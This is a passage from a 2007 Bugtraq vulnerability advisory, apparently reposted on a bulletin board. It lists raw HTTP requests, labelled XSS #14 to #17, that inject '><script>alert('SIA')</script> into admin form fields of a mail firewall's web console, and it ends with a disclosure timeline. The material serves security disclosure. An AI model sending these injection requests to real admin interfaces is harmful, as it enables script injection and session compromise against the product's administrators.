D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro= ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att= rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue= Str=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.a= ttrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1&rows%5B2%5D.attrValid= ate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.attrDepends=3D&rows%5B2= %5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.attrValue= StrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&rows= %5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.at= trValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D&r= ows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.at= trValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrValue= =3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D= 2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B= 1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4= %5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT= agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m= onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144= 0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D= &rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.= attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal= ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1= 2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe= lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe= lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV= alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La= belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060= 019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300= 60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5= B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal= ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&= rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%= 5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep= ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%= 5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:56 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #14 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService= Properties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro= ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24= %5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.= modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI= d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res= ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5= D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro= ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att= rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue= Str=3D50&rows%5B2%5D.attrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1= &rows%5B2%5D.attrValidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.a= ttrDepends=3D&rows%5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue= &rows%5B2%5D.attrValueStrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B= 2%5D.attrValue=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ro= ws%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.= attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D= &rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.= attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal= ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D= 2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B= 1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4= %5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT= agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m= onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144= 0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D= &rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.= attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal= ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1= 2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe= lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe= lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV= alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La= belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060= 019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300= 60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5= B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal= ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&= rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%= 5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep= ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%= 5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:00 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #15 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= init&procId=3D164 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService= Properties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro= ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24= %5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.= modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI= d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res= ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5= D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro= ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att= rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue= Str=3D50&rows%5B2%5D.attrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1= &rows%5B2%5D.attrValidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.a= ttrDepends=3D&rows%5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue= &rows%5B2%5D.attrValueStrClone=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3= C%2Fscript%3E&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&ro= ws%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.= attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D= &rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.= attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal= ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D= 2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B= 1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4= %5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT= agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m= onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144= 0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D= &rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.= attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal= ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1= 2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe= lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe= lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV= alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La= belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060= 019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300= 60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5= B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal= ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&= rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%= 5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep= ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%= 5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #16 ] :. POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=3D= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=3D= init&isMenuToggled=3D1 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRout= ingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E dtype=3DINBOUND&input1=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscri= pt%3E&input2=3D&submitValue=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #17 ] :. POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=3Dsave HTTP/1.= 1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=3Dinit&isMenuToggle= d=3D1&procId=3D90 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2237 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fme= thod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMen= u%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D10&rows%5B0%5D.attrName=3Dpass_monitor&rows%5B0%5D.attrType=3D5&= rows%5B0%5D.attrValidate=3D&rows%5B0%5D.attrValidateStr=3D&rows%5B0%5D.at= trDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.modifyable=3Dtrue&= rows%5B0%5D.attrValueStrClone=3D0&rows%5B0%5D.langTagId=3D2000006&rows%5B= 1%5D.attrName=3Denable_dos&rows%5B1%5D.attrType=3D5&rows%5B1%5D.attrValid= ate=3D&rows%5B1%5D.attrValidateStr=3D&rows%5B1%5D.attrDepends=3D&rows%5B1= %5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.attrValue= StrClone=3D0&rows%5B1%5D.langTagId=3D2000008&rows%5B2%5D.attrName=3Dshm_t= imeout&rows%5B2%5D.attrType=3D2&rows%5B2%5D.attrValidate=3D%5B1-65535%5D&= rows%5B2%5D.attrValidateStr=3D%5B1-65535%5D&rows%5B2%5D.attrDepends=3D&ro= ws%5B2%5D.multipleValue=3D0&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.att= rValueStrClone=3D100&rows%5B2%5D.langTagId=3D2001009&rows%5B2%5D.attrValu= eStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.= attrName=3Dshm_spamcount&rows%5B3%5D.attrType=3D2&rows%5B3%5D.attrValidat= e=3D%5B1-65535%5D&rows%5B3%5D.attrValidateStr=3D%5B1-65535%5D&rows%5B3%5D= =2EattrDepends=3D&rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3D= true&rows%5B3%5D.attrValueStrClone=3D100&rows%5B3%5D.langTagId=3D2001010&= rows%5B3%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fs= cript%3E&rows%5B4%5D.attrName=3Dpasscrackswitch&rows%5B4%5D.attrType=3D5&= rows%5B4%5D.attrValidate=3D&rows%5B4%5D.attrValidateStr=3D&rows%5B4%5D.at= trDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4%5D.modifyable=3Dtrue&= rows%5B4%5D.attrValueStrClone=3D0&rows%5B4%5D.langTagId=3D2004104&rows%5B= 5%5D.attrName=3Dpasscrackcount&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrV= alidate=3D%5B1-100%5D&rows%5B5%5D.attrValidateStr=3D%5B1-100%5D&rows%5B5%= 5D.attrDepends=3D&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3D= true&rows%5B5%5D.attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2004105&ro= ws%5B5%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscr= ipt%3E&rows%5B6%5D.attrName=3Dpasstimeout&rows%5B6%5D.attrType=3D2&rows%5= B6%5D.attrValidate=3D%5B1-3600%5D&rows%5B6%5D.attrValidateStr=3D%5B1-3600= %5D&rows%5B6%5D.attrDepends=3D&rows%5B6%5D.multipleValue=3D0&rows%5B6%5D.= modifyable=3Dtrue&rows%5B6%5D.attrValueStrClone=3D60&rows%5B6%5D.langTagI= d=3D2004106&rows%5B6%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA4%= 27%29%3C%2Fscript%3E&submitValue=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:24:22 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ TIMELINE ] :. 22/Mar/2007 - We publish the advisory. 07/Mar/2007 - Second contact. Provider doesn't answered. 27/Feb/2007 - First contact with provider. 19/Feb/2007 - Vulnerabilities founded. --=_gantz-15840-1174901611-0001-2--

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 deese. 的文章

文章代碼(AID): #161_ud00 (Bugtraq)